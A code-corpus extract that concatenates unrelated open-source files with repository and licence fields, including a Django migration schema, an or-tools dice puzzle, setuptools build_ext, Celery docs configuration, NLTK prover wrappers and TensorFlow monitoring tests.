'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'})
},
'indivo.sessiontoken': {
'Meta': {'object_name': 'SessionToken'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessiontoken_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'})
},
'indivo.simpleclinicalnote': {
'Meta': {'object_name': 'SimpleClinicalNote', '_ormbases': ['indivo.Fact']},
'chief_complaint': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_of_visit': ('django.db.models.fields.DateTimeField', [], {}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'finalized_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'provider_institution': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'provider_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'signed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'specialty': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'specialty_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'specialty_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'specialty_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'visit_location': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'visit_type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'visit_type_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'visit_type_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'visit_type_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'})
},
'indivo.statusname': {
'Meta': {'object_name': 'StatusName'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '24'})
},
'indivo.vitals': {
'Meta': {'object_name': 'Vitals', '_ormbases': ['indivo.Fact']},
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_measured': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'unit_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'unit_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'unit_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {})
}
}
complete_apps = ['indivo']
| gpl-3.0 |
petesburgh/or-tools | examples/python/labeled_dice.py | 34 | 4106 | # Copyright 2010 Hakan Kjellerstrand [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Labeled dice problem in Google CP Solver.
From Jim Orlin 'Colored letters, labeled dice: a logic puzzle'
http://jimorlin.wordpress.com/2009/02/17/colored-letters-labeled-dice-a-logic-puzzle/
'''
My daughter Jenn bough a puzzle book, and showed me a cute puzzle. There
are 13 words as follows: BUOY, CAVE, CELT, FLUB, FORK, HEMP, JUDY,
JUNK, LIMN, QUIP, SWAG, VISA, WISH.
There are 24 different letters that appear in the 13 words. The question
is: can one assign the 24 letters to 4 different cubes so that the
four letters of each word appears on different cubes. (There is one
letter from each word on each cube.) It might be fun for you to try
it. I'll give a small hint at the end of this post. The puzzle was
created by Humphrey Dudley.
'''
Jim Orlin's followup 'Update on Logic Puzzle':
http://jimorlin.wordpress.com/2009/02/21/update-on-logic-puzzle/
Compare with the following models:
* ECLiPSe: http://hakank.org/eclipse/labeled_dice.ecl
* Comet : http://www.hakank.org/comet/labeled_dice.co
* Gecode : http://hakank.org/gecode/labeled_dice.cpp
* SICStus: http://hakank.org/sicstus/labeled_dice.pl
* Zinc : http://hakank.org/minizinc/labeled_dice.zinc
This model was created by Hakan Kjellerstrand ([email protected])
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
from ortools.constraint_solver import pywrapcp
def main():
# Create the solver.
solver = pywrapcp.Solver("Labeled dice")
#
# data
#
n = 4
m = 24
A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, Y = (
range(m))
letters = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
"N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "Y"]
num_words = 13
words = [
[B, U, O, Y],
[C, A, V, E],
[C, E, L, T],
[F, L, U, B],
[F, O, R, K],
[H, E, M, P],
[J, U, D, Y],
[J, U, N, K],
[L, I, M, N],
[Q, U, I, P],
[S, W, A, G],
[V, I, S, A],
[W, I, S, H]
]
#
# declare variables
#
dice = [solver.IntVar(0, n - 1, "dice[%i]" % i) for i in range(m)]
#
# constraints
#
# the letters in a word must be on a different die
for i in range(num_words):
solver.Add(solver.AllDifferent([dice[words[i][j]] for j in range(n)]))
# there must be exactly 6 letters of each die
for i in range(n):
b = [solver.IsEqualCstVar(dice[j], i) for j in range(m)]
solver.Add(solver.Sum(b) == 6)
#
# solution and search
#
solution = solver.Assignment()
solution.Add(dice)
db = solver.Phase(dice,
solver.CHOOSE_FIRST_UNBOUND,
solver.ASSIGN_MIN_VALUE)
#
# result
#
solver.NewSearch(db)
num_solutions = 0
while solver.NextSolution():
num_solutions += 1
# print "dice:", [(letters[i],dice[i].Value()) for i in range(m)]
for d in range(n):
print "die %i:" % d,
for i in range(m):
if dice[i].Value() == d:
print letters[i],
print
print "The words with the cube label:"
for i in range(num_words):
for j in range(n):
print "%s (%i)" % (letters[words[i][j]], dice[words[i][j]].Value()),
print
print
solver.EndSearch()
print
print "num_solutions:", num_solutions
print "failures:", solver.Failures()
print "branches:", solver.Branches()
print "WallTime:", solver.WallTime()
if __name__ == "__main__":
main()
| apache-2.0 |
sursum/buckanjaren | buckanjaren/lib/python3.5/site-packages/setuptools/command/build_ext.py | 193 | 13049 | import os
import sys
import itertools
import imp
from distutils.command.build_ext import build_ext as _du_build_ext
from distutils.file_util import copy_file
from distutils.ccompiler import new_compiler
from distutils.sysconfig import customize_compiler, get_config_var
from distutils.errors import DistutilsError
from distutils import log
from setuptools.extension import Library
from setuptools.extern import six
try:
# Attempt to use Cython for building extensions, if available
from Cython.Distutils.build_ext import build_ext as _build_ext
except ImportError:
_build_ext = _du_build_ext
# make sure _config_vars is initialized
get_config_var("LDSHARED")
from distutils.sysconfig import _config_vars as _CONFIG_VARS
def _customize_compiler_for_shlib(compiler):
if sys.platform == "darwin":
# building .dylib requires additional compiler flags on OSX; here we
# temporarily substitute the pyconfig.h variables so that distutils'
# 'customize_compiler' uses them before we build the shared libraries.
tmp = _CONFIG_VARS.copy()
try:
# XXX Help! I don't have any idea whether these are right...
_CONFIG_VARS['LDSHARED'] = (
"gcc -Wl,-x -dynamiclib -undefined dynamic_lookup")
_CONFIG_VARS['CCSHARED'] = " -dynamiclib"
_CONFIG_VARS['SO'] = ".dylib"
customize_compiler(compiler)
finally:
_CONFIG_VARS.clear()
_CONFIG_VARS.update(tmp)
else:
customize_compiler(compiler)
have_rtld = False
use_stubs = False
libtype = 'shared'
if sys.platform == "darwin":
use_stubs = True
elif os.name != 'nt':
try:
import dl
use_stubs = have_rtld = hasattr(dl, 'RTLD_NOW')
except ImportError:
pass
if_dl = lambda s: s if have_rtld else ''
def get_abi3_suffix():
"""Return the file extension for an abi3-compliant Extension()"""
for suffix, _, _ in (s for s in imp.get_suffixes() if s[2] == imp.C_EXTENSION):
if '.abi3' in suffix: # Unix
return suffix
elif suffix == '.pyd': # Windows
return suffix
class build_ext(_build_ext):
def run(self):
"""Build extensions in build directory, then copy if --inplace"""
old_inplace, self.inplace = self.inplace, 0
_build_ext.run(self)
self.inplace = old_inplace
if old_inplace:
self.copy_extensions_to_source()
def copy_extensions_to_source(self):
build_py = self.get_finalized_command('build_py')
for ext in self.extensions:
fullname = self.get_ext_fullname(ext.name)
filename = self.get_ext_filename(fullname)
modpath = fullname.split('.')
package = '.'.join(modpath[:-1])
package_dir = build_py.get_package_dir(package)
dest_filename = os.path.join(package_dir,
os.path.basename(filename))
src_filename = os.path.join(self.build_lib, filename)
# Always copy, even if source is older than destination, to ensure
# that the right extensions for the current Python/platform are
# used.
copy_file(
src_filename, dest_filename, verbose=self.verbose,
dry_run=self.dry_run
)
if ext._needs_stub:
self.write_stub(package_dir or os.curdir, ext, True)
def get_ext_filename(self, fullname):
filename = _build_ext.get_ext_filename(self, fullname)
if fullname in self.ext_map:
ext = self.ext_map[fullname]
use_abi3 = (
six.PY3
and getattr(ext, 'py_limited_api')
and get_abi3_suffix()
)
if use_abi3:
so_ext = _get_config_var_837('EXT_SUFFIX')
filename = filename[:-len(so_ext)]
filename = filename + get_abi3_suffix()
if isinstance(ext, Library):
fn, ext = os.path.splitext(filename)
return self.shlib_compiler.library_filename(fn, libtype)
elif use_stubs and ext._links_to_dynamic:
d, fn = os.path.split(filename)
return os.path.join(d, 'dl-' + fn)
return filename
def initialize_options(self):
_build_ext.initialize_options(self)
self.shlib_compiler = None
self.shlibs = []
self.ext_map = {}
def finalize_options(self):
_build_ext.finalize_options(self)
self.extensions = self.extensions or []
self.check_extensions_list(self.extensions)
self.shlibs = [ext for ext in self.extensions
if isinstance(ext, Library)]
if self.shlibs:
self.setup_shlib_compiler()
for ext in self.extensions:
ext._full_name = self.get_ext_fullname(ext.name)
for ext in self.extensions:
fullname = ext._full_name
self.ext_map[fullname] = ext
# distutils 3.1 will also ask for module names
# XXX what to do with conflicts?
self.ext_map[fullname.split('.')[-1]] = ext
ltd = self.shlibs and self.links_to_dynamic(ext) or False
ns = ltd and use_stubs and not isinstance(ext, Library)
ext._links_to_dynamic = ltd
ext._needs_stub = ns
filename = ext._file_name = self.get_ext_filename(fullname)
libdir = os.path.dirname(os.path.join(self.build_lib, filename))
if ltd and libdir not in ext.library_dirs:
ext.library_dirs.append(libdir)
if ltd and use_stubs and os.curdir not in ext.runtime_library_dirs:
ext.runtime_library_dirs.append(os.curdir)
def setup_shlib_compiler(self):
compiler = self.shlib_compiler = new_compiler(
compiler=self.compiler, dry_run=self.dry_run, force=self.force
)
_customize_compiler_for_shlib(compiler)
if self.include_dirs is not None:
compiler.set_include_dirs(self.include_dirs)
if self.define is not None:
# 'define' option is a list of (name,value) tuples
for (name, value) in self.define:
compiler.define_macro(name, value)
if self.undef is not None:
for macro in self.undef:
compiler.undefine_macro(macro)
if self.libraries is not None:
compiler.set_libraries(self.libraries)
if self.library_dirs is not None:
compiler.set_library_dirs(self.library_dirs)
if self.rpath is not None:
compiler.set_runtime_library_dirs(self.rpath)
if self.link_objects is not None:
compiler.set_link_objects(self.link_objects)
# hack so distutils' build_extension() builds a library instead
compiler.link_shared_object = link_shared_object.__get__(compiler)
def get_export_symbols(self, ext):
if isinstance(ext, Library):
return ext.export_symbols
return _build_ext.get_export_symbols(self, ext)
def build_extension(self, ext):
ext._convert_pyx_sources_to_lang()
_compiler = self.compiler
try:
if isinstance(ext, Library):
self.compiler = self.shlib_compiler
_build_ext.build_extension(self, ext)
if ext._needs_stub:
cmd = self.get_finalized_command('build_py').build_lib
self.write_stub(cmd, ext)
finally:
self.compiler = _compiler
def links_to_dynamic(self, ext):
"""Return true if 'ext' links to a dynamic lib in the same package"""
# XXX this should check to ensure the lib is actually being built
# XXX as dynamic, and not just using a locally-found version or a
# XXX static-compiled version
libnames = dict.fromkeys([lib._full_name for lib in self.shlibs])
pkg = '.'.join(ext._full_name.split('.')[:-1] + [''])
return any(pkg + libname in libnames for libname in ext.libraries)
def get_outputs(self):
return _build_ext.get_outputs(self) + self.__get_stubs_outputs()
def __get_stubs_outputs(self):
# assemble the base name for each extension that needs a stub
ns_ext_bases = (
os.path.join(self.build_lib, *ext._full_name.split('.'))
for ext in self.extensions
if ext._needs_stub
)
# pair each base with the extension
pairs = itertools.product(ns_ext_bases, self.__get_output_extensions())
return list(base + fnext for base, fnext in pairs)
def __get_output_extensions(self):
yield '.py'
yield '.pyc'
if self.get_finalized_command('build_py').optimize:
yield '.pyo'
def write_stub(self, output_dir, ext, compile=False):
log.info("writing stub loader for %s to %s", ext._full_name,
output_dir)
stub_file = (os.path.join(output_dir, *ext._full_name.split('.')) +
'.py')
if compile and os.path.exists(stub_file):
raise DistutilsError(stub_file + " already exists! Please delete.")
if not self.dry_run:
f = open(stub_file, 'w')
f.write(
'\n'.join([
"def __bootstrap__():",
" global __bootstrap__, __file__, __loader__",
" import sys, os, pkg_resources, imp" + if_dl(", dl"),
" __file__ = pkg_resources.resource_filename"
"(__name__,%r)"
% os.path.basename(ext._file_name),
" del __bootstrap__",
" if '__loader__' in globals():",
" del __loader__",
if_dl(" old_flags = sys.getdlopenflags()"),
" old_dir = os.getcwd()",
" try:",
" os.chdir(os.path.dirname(__file__))",
if_dl(" sys.setdlopenflags(dl.RTLD_NOW)"),
" imp.load_dynamic(__name__,__file__)",
" finally:",
if_dl(" sys.setdlopenflags(old_flags)"),
" os.chdir(old_dir)",
"__bootstrap__()",
"" # terminal \n
])
)
f.close()
if compile:
from distutils.util import byte_compile
byte_compile([stub_file], optimize=0,
force=True, dry_run=self.dry_run)
optimize = self.get_finalized_command('install_lib').optimize
if optimize > 0:
byte_compile([stub_file], optimize=optimize,
force=True, dry_run=self.dry_run)
if os.path.exists(stub_file) and not self.dry_run:
os.unlink(stub_file)
if use_stubs or os.name == 'nt':
# Build shared libraries
#
def link_shared_object(
self, objects, output_libname, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None, export_symbols=None,
debug=0, extra_preargs=None, extra_postargs=None, build_temp=None,
target_lang=None):
self.link(
self.SHARED_LIBRARY, objects, output_libname,
output_dir, libraries, library_dirs, runtime_library_dirs,
export_symbols, debug, extra_preargs, extra_postargs,
build_temp, target_lang
)
else:
# Build static libraries everywhere else
libtype = 'static'
def link_shared_object(
self, objects, output_libname, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None, export_symbols=None,
debug=0, extra_preargs=None, extra_postargs=None, build_temp=None,
target_lang=None):
# XXX we need to either disallow these attrs on Library instances,
# or warn/abort here if set, or something...
# libraries=None, library_dirs=None, runtime_library_dirs=None,
# export_symbols=None, extra_preargs=None, extra_postargs=None,
# build_temp=None
assert output_dir is None # distutils build_ext doesn't pass this
output_dir, filename = os.path.split(output_libname)
basename, ext = os.path.splitext(filename)
if self.library_filename("x").startswith('lib'):
# strip 'lib' prefix; this is kludgy if some platform uses
# a different prefix
basename = basename[3:]
self.create_static_lib(
objects, basename, output_dir, debug, target_lang
)
def _get_config_var_837(name):
"""
In https://github.com/pypa/setuptools/pull/837, we discovered
Python 3.3.0 exposes the extension suffix under the name 'SO'.
"""
if sys.version_info < (3, 3, 1):
name = 'SO'
return get_config_var(name)
| mit |
KarimAllah/celery | docs/conf.py | 17 | 3240 | # -*- coding: utf-8 -*-
import sys
import os
# eventlet/gevent should not monkey patch anything.
os.environ["GEVENT_NOPATCH"] = "yes"
os.environ["EVENTLET_NOPATCH"] = "yes"
os.environ["CELERY_LOADER"] = "default"
this = os.path.dirname(os.path.abspath(__file__))
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
sys.path.append(os.path.join(os.pardir, "tests"))
sys.path.append(os.path.join(this, "_ext"))
import celery
# use app loader
from celery import Celery
app = Celery(set_as_current=True)
app.conf.update(BROKER_TRANSPORT="memory",
CELERY_RESULT_BACKEND="cache",
CELERY_CACHE_BACKEND="memory",
CELERYD_HIJACK_ROOT_LOGGER=False,
CELERYD_LOG_COLOR=False)
# General configuration
# ---------------------
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.intersphinx',
'sphinxcontrib.issuetracker',
'celerydocs']
html_show_sphinx = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Celery'
copyright = u'2009-2011, Ask Solem & Contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ".".join(map(str, celery.VERSION[0:2]))
# The full version, including alpha/beta/rc tags.
release = celery.__version__
exclude_trees = ['.build']
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
intersphinx_mapping = {
"http://docs.python.org/dev": None,
"http://kombu.readthedocs.org/en/latest/": None,
"http://django-celery.readthedocs.org/en/latest": None,
}
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'trac'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
html_use_smartypants = True
# If false, no module index is generated.
html_use_modindex = True
# If false, no index is generated.
html_use_index = True
latex_documents = [
('index', 'Celery.tex', ur'Celery Documentation',
ur'Ask Solem & Contributors', 'manual'),
]
html_theme = "celery"
html_theme_path = ["_theme"]
html_sidebars = {
'index': ['sidebarintro.html', 'sourcelink.html', 'searchbox.html'],
'**': ['sidebarlogo.html', 'relations.html',
'sourcelink.html', 'searchbox.html'],
}
### Issuetracker
if False: #not os.environ.get("SKIP_ISSUES"):
# Issue tracker is not working, just hangs
issuetracker = "github"
issuetracker_project = "ask/celery"
issuetracker_issue_pattern = r'[Ii]ssue #(\d+)'
| bsd-3-clause |
xtuml/pyxtuml | examples/list_bp_enums.py | 2 | 1385 | #!/usr/bin/env python
# encoding: utf-8
# Copyright (C) 2017 John Törnblom
#
# This file is part of pyxtuml.
#
# pyxtuml is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# pyxtuml is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with pyxtuml. If not, see <http://www.gnu.org/licenses/>.
import sys
from xtuml import navigate_one as one
from bridgepoint import ooaofooa
if len(sys.argv) < 2:
print('')
print(' usage: %s <path to bridgepoint model folder>' % sys.argv[0])
print('')
sys.exit(1)
m = ooaofooa.load_metamodel(sys.argv[1])
get_name = lambda inst: one(inst).S_DT[17]().Name
for s_edt in sorted(m.select_many('S_EDT'), key=get_name):
print(get_name(s_edt))
is_first = lambda inst: not one(inst).S_ENUM[56, 'succeeds']()
s_enum = one(s_edt).S_ENUM[27](is_first)
while s_enum:
print(' %s' % s_enum.Name)
s_enum = one(s_enum).S_ENUM[56, 'precedes']()
| lgpl-3.0 |
rancher/python-agent | cattle/agent/handler.py | 3 | 3291 | import re
import logging
from cattle import utils
from cattle.lock import lock
from cattle.utils import JsonObject
log = logging.getLogger("agent")
class BaseHandler(object):
def __init__(self):
pass
def events(self):
ret = []
for i in utils.events_from_methods(self):
ret.append(".".join([self._get_handler_category(None), i]))
return ret
def supports(self, req):
method = self._get_method_for(req)
if method is None:
return False
return self._check_supports(req)
def execute(self, req):
method = self._get_method_for(req)
if method is None:
return None
else:
return method(req=req, **req.data.__dict__)
def _get_method_for(self, req):
prefix = ''
category = self._get_handler_category(req)
if len(category) > 0:
prefix = category + '.'
if len(req.name) <= len(prefix):
return None
name = req.name[len(prefix):].replace('.', '_')
idx = name.find(';')
if idx != -1:
name = name[0:idx]
try:
return getattr(self, name)
except:
return None
def _reply(self, req, response_data):
if req is None:
return None
resp = utils.reply(req)
resp.data = JsonObject(response_data)
return resp
def _do(self, req=None, check=None, result=None, lock_obj=None,
action=None, post_check=True):
if check():
return self._reply(req, result())
with lock(lock_obj):
if check():
return self._reply(req, result())
action()
data = result()
if post_check and not check():
raise Exception("Operation failed")
return self._reply(req, data)
def _get_response_data(self, req, obj):
resource_type = req.get("resourceType")
type = obj.get("type")
if type is not None:
inner_name = re.sub("([A-Z])", r'_\1', type)
method_name = "_get_{0}_data".format(inner_name).lower()
method = None
try:
method = getattr(self, method_name)
except AttributeError:
pass
if method is not None:
return {resource_type: method(obj)}
return {}
def _check_supports(self, req):
raise Exception("Not implemented")
def _get_handler_category(self, req):
return ''
class KindBasedMixin(object):
CHECK_PATHS = [
["imageStoragePoolMap", "storagePool", "kind"],
["instanceHostMap", "host", "kind"],
["instanceForceStop", "kind"],
["instanceInspect", "kind"],
["instancePull", "kind"]
]
def __init__(self, kind=None):
super(KindBasedMixin, self).__init__()
self._kind = kind
def _check_supports(self, req):
for check in KindBasedMixin.CHECK_PATHS:
val = req.data
try:
for part in check:
val = val[part]
if val == self._kind:
return True
except KeyError:
pass
return False
| apache-2.0 |
steven-cutting/icsisumm | icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk/inference/inference.py | 9 | 3449 | # Natural Language Toolkit: Interface to Theorem Provers
#
# Author: Dan Garrette <[email protected]>
# Ewan Klein <[email protected]>
#
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
from nltk.sem.logic import ApplicationExpression, Operator, LogicParser
import tableau
import prover9
import mace
"""
A wrapper module that calls theorem provers and model builders.
"""
def get_prover(goal=None, assumptions=[], prover_name='Prover9'):
"""
@param goal: Input expression to prove
@type goal: L{logic.Expression}
@param assumptions: Input expressions to use as assumptions in the proof
@type assumptions: L{list} of logic.Expression objects
"""
if prover_name.lower() == 'tableau':
prover_module = tableau.Tableau
elif prover_name.lower() == 'prover9':
prover_module = prover9.Prover9
return prover_module(goal, assumptions)
def get_model_builder(goal=None, assumptions=[], model_builder_name='Mace'):
"""
@param goal: Input expression to prove
@type goal: L{logic.Expression}
@param assumptions: Input expressions to use as assumptions in the proof
@type assumptions: L{list} of logic.Expression objects
"""
if model_builder_name.lower() == 'mace':
builder_module = mace.Mace
return builder_module(goal, assumptions)
def demo_drt_glue_remove_duplicates(show_example=-1):
from nltk_contrib.gluesemantics import drt_glue
examples = ['David sees Mary',
'David eats a sandwich',
'every man chases a dog',
'John chases himself',
'John likes a cat',
'John likes every cat',
'he likes a dog',
'a dog walks and he leaves']
example_num = 0
hit = False
for sentence in examples:
if example_num==show_example or show_example==-1:
print '[[[Example %s]]] %s' % (example_num, sentence)
readings = drt_glue.parse_to_meaning(sentence, True)
for j in range(len(readings)):
reading = readings[j].simplify().resolve_anaphora()
print reading
print ''
hit = True
example_num += 1
if not hit:
print 'example not found'
def demo():
from nltk_contrib.drt import DRT
DRT.testTp_equals()
print '\n'
lp = LogicParser()
a = lp.parse(r'some x.((man x) and (walks x))')
b = lp.parse(r'some x.((walks x) and (man x))')
bicond = ApplicationExpression(ApplicationExpression(Operator('iff'), a), b)
print "Trying to prove:\n '%s <-> %s'" % (a.infixify(), b.infixify())
print 'tableau: %s' % get_prover(bicond, prover_name='tableau').prove()
print 'Prover9: %s' % get_prover(bicond, prover_name='Prover9').prove()
print '\n'
demo_drt_glue_remove_duplicates()
lp = LogicParser()
a = lp.parse(r'all x.((man x) implies (mortal x))')
b = lp.parse(r'(man socrates)')
c1 = lp.parse(r'(mortal socrates)')
c2 = lp.parse(r'(not (mortal socrates))')
print get_prover(c1, [a,b], 'prover9').prove()
print get_prover(c2, [a,b], 'prover9').prove()
print get_model_builder(c1, [a,b], 'mace').build_model()
print get_model_builder(c2, [a,b], 'mace').build_model()
if __name__ == '__main__':
demo()
| gpl-3.0 |
Intel-tensorflow/tensorflow | tensorflow/python/eager/monitoring_test.py | 14 | 4979 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitoring."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from tensorflow.python.eager import monitoring
from tensorflow.python.eager import test
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
class MonitoringTest(test_util.TensorFlowTestCase):
def test_counter(self):
counter = monitoring.Counter('test/counter', 'test counter')
counter.get_cell().increase_by(1)
self.assertEqual(counter.get_cell().value(), 1)
counter.get_cell().increase_by(5)
self.assertEqual(counter.get_cell().value(), 6)
def test_multiple_counters(self):
counter1 = monitoring.Counter('test/counter1', 'test counter', 'label1')
counter1.get_cell('foo').increase_by(1)
self.assertEqual(counter1.get_cell('foo').value(), 1)
counter2 = monitoring.Counter('test/counter2', 'test counter', 'label1',
'label2')
counter2.get_cell('foo', 'bar').increase_by(5)
self.assertEqual(counter2.get_cell('foo', 'bar').value(), 5)
def test_same_counter(self):
counter1 = monitoring.Counter('test/same_counter', 'test counter') # pylint: disable=unused-variable
with self.assertRaises(errors.AlreadyExistsError):
counter2 = monitoring.Counter('test/same_counter', 'test counter') # pylint: disable=unused-variable
def test_int_gauge(self):
gauge = monitoring.IntGauge('test/gauge', 'test gauge')
gauge.get_cell().set(1)
self.assertEqual(gauge.get_cell().value(), 1)
gauge.get_cell().set(5)
self.assertEqual(gauge.get_cell().value(), 5)
gauge1 = monitoring.IntGauge('test/gauge1', 'test gauge1', 'label1')
gauge1.get_cell('foo').set(2)
self.assertEqual(gauge1.get_cell('foo').value(), 2)
def test_string_gauge(self):
gauge = monitoring.StringGauge('test/gauge', 'test gauge')
gauge.get_cell().set('left')
self.assertEqual(gauge.get_cell().value(), 'left')
gauge.get_cell().set('right')
self.assertEqual(gauge.get_cell().value(), 'right')
gauge1 = monitoring.StringGauge('test/gauge1', 'test gauge1', 'label1')
gauge1.get_cell('foo').set('start')
self.assertEqual(gauge1.get_cell('foo').value(), 'start')
def test_bool_gauge(self):
gauge = monitoring.BoolGauge('test/gauge', 'test gauge')
gauge.get_cell().set(True)
self.assertTrue(gauge.get_cell().value())
gauge.get_cell().set(False)
self.assertFalse(gauge.get_cell().value())
gauge1 = monitoring.BoolGauge('test/gauge1', 'test gauge1', 'label1')
gauge1.get_cell('foo').set(True)
self.assertTrue(gauge1.get_cell('foo').value())
def test_sampler(self):
buckets = monitoring.ExponentialBuckets(1.0, 2.0, 2)
sampler = monitoring.Sampler('test/sampler', buckets, 'test sampler')
sampler.get_cell().add(1.0)
sampler.get_cell().add(5.0)
histogram_proto = sampler.get_cell().value()
self.assertEqual(histogram_proto.min, 1.0)
self.assertEqual(histogram_proto.num, 2.0)
self.assertEqual(histogram_proto.sum, 6.0)
sampler1 = monitoring.Sampler('test/sampler1', buckets, 'test sampler',
'label1')
sampler1.get_cell('foo').add(2.0)
sampler1.get_cell('foo').add(4.0)
sampler1.get_cell('bar').add(8.0)
histogram_proto1 = sampler1.get_cell('foo').value()
self.assertEqual(histogram_proto1.max, 4.0)
self.assertEqual(histogram_proto1.num, 2.0)
self.assertEqual(histogram_proto1.sum, 6.0)
def test_context_manager(self):
counter = monitoring.Counter('test/ctxmgr', 'test context manager', 'slot')
with monitoring.MonitoredTimer(counter.get_cell('long')):
time.sleep(0.01)
with monitoring.MonitoredTimer(counter.get_cell('short')):
time.sleep(0.01)
self.assertGreater(
counter.get_cell('long').value(),
counter.get_cell('short').value())
def test_function_decorator(self):
counter = monitoring.Counter('test/funcdecorator', 'test func decorator')
@monitoring.monitored_timer(counter.get_cell())
def timed_function(seconds):
time.sleep(seconds)
timed_function(0.001)
self.assertGreater(counter.get_cell().value(), 1000)
if __name__ == '__main__':
test.main()
| apache-2.0 |
Bluscream/Discord-Selfbot | cogs/debugger.py | 1 | 17971 | import pkg_resources
import contextlib
import sys
import inspect
import os
import shutil
import glob
import math
import textwrap
from PythonGists import PythonGists
from discord.ext import commands
from io import StringIO
from traceback import format_exc
